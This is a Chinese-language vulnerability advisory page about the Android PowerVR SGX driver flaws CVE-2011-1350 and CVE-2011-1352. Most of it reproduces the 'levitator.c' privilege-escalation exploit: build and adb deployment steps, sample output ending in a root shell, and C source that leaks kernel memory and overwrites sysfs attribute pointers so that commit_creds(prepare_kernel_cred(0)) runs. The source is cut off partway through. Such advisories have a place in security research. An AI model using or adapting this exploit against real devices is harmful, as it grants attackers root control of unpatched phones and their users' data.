Android PowerVR SGX Driver信息泄露漏洞(CVE

发布日期:2011-11-03
更新日期:2013-03-07

受影响系统:
Android Open Handset Alliance Android <= 2.3.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57900
 CVE(CAN) ID: CVE-2011-1350
 
Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。
 
Android 2.3.5 及之前版本内的PowerVR SGX驱动程序允许攻击者获取内核栈内存敏感信息,受害者打开恶意Android应用后,其中含有特制长度参数的pvrsrvkm设备请求可造成敏感信息泄露。
 
<*来源:Geremy Condra
 
  链接:https://code.google.com/p/android/issues/detail?id=21522
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
 * levitator.c
 *
 * Android < 2.3.6 PowerVR SGX Privilege Escalation Exploit
 * Jon Larimer <jlarimer@gmail.com>
 * Jon Oberheide <jon@oberheide.org>
 *
 * Information:
 *
 *  ?name=CVE-2011-1352
 *
 *  CVE-2011-1352 is a kernel memory corruption vulnerability that can lead
*  to privilege escalation. Any user with access to /dev/pvrsrvkm can use
*  this bug to obtain root privileges on an affected device.
 *
 *  ?name=CVE-2011-1350
 *
 *  CVE-2011-1350 allows leaking a portion of kernel memory to user mode
*  processes. This vulnerability exists because of improper bounds checking
 *  when returning data to user mode from an ioctl system call.
 *
 * Usage:
 *
 *  $ CC="/path/to/arm-linux-androideabi-gcc"
 *  $ NDK="/path/to/ndk/arch-arm"
 *  $ CFLAGS="-I$NDK/usr/include/"
 *  $ LDFLAGS="-Wl,-rpath-link=$NDK/usr/lib -L$NDK/usr/lib -nostdlib $NDK/usr/lib/crtbegin_dynamic.o -lc"
 *  $ $CC -o levitator levitator.c $CFLAGS $LDFLAGS
 *  $ adb push levitator /data/local/tmp/
 *  $ adb shell
 *  $ cd /data/local/tmp
 *  $ ./levitator
 *  [+] looking for symbols...
 *  [+] resolved symbol commit_creds to 0xc00770dc
 *  [+] resolved symbol prepare_kernel_cred to 0xc0076f64
 *  [+] resolved symbol dev_attr_ro to 0xc05a5834
 *  [+] opening prvsrvkm device...
 *  [+] dumping kernel memory...
 *  [+] searching kmem for dev_attr_ro pointers...
 *  [+] poisoned 16 dev_attr_ro pointers with fake_dev_attr_ro!
 *  [+] clobbering kmem with poisoned pointers...
 *  [+] triggering privesc via block ro sysfs attribute...
 *  [+] restoring original dev_attr_ro pointers...
 *  [+] restored 16 dev_attr_ro pointers!
 *  [+] privileges escalated, enjoy your shell!
 *  # id
 *  uid=0(root) gid=0(root)
 *
 *  Notes:
 *
 *    The vulnerability affects Android devices with the PowerVR SGX chipset
 *    which includes popular models like the Nexus S and Galaxy S series. The
*    vulnerability was patched in the Android 2.3.6 OTA update.
 */
 
#include <stdio.h>
 #include <stdint.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <dirent.h>
 #include <sys/stat.h>
 #include <sys/types.h>
 #include <sys/ioctl.h>
 
#define CONNECT_SERVICES 0xc01c670c
 #define DUMP_SIZE        161920
 
typedef struct {
    uint32_t ui32BridgeID;
    uint32_t ui32Size;
    void *pvParamIn;
    uint32_t ui32InBufferSize;
    void *pvParamOut;
    uint32_t ui32OutBufferSize;
    void * hKernelServices;
 } PVRSRV_BRIDGE_PACKAGE;
 
typedef int (* _commit_creds)(unsigned long cred);
 typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred);
 _commit_creds commit_creds;
 _prepare_kernel_cred prepare_kernel_cred;
 
ssize_t
 fake_disk_ro_show(void *dev, void *attr, char *buf)
 {
    commit_creds(prepare_kernel_cred(0));
    return sprintf(buf, "0wned\n");
 }
 
struct attribute {
    const char *name;
    void *owner;
    mode_t mode;
 };
 
struct device_attribute {
    struct attribute attr;
    ssize_t (*show)(void *dev, void *attr, char *buf);
    ssize_t (*store)(void *dev, void *attr, const char *buf, size_t count);
 };
 
struct device_attribute fake_dev_attr_ro = {
    .attr    = {
        .name = "ro",
        .mode = S_IRWXU | S_IRWXG | S_IRWXO,
    },
    .show = fake_disk_ro_show,
    .store = NULL,
 };
 
unsigned long
 get_symbol(char *name)
 {
    FILE *f;
    unsigned long addr;
    char dummy, sname[512];
    int ret = 0;

f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wywwwd.html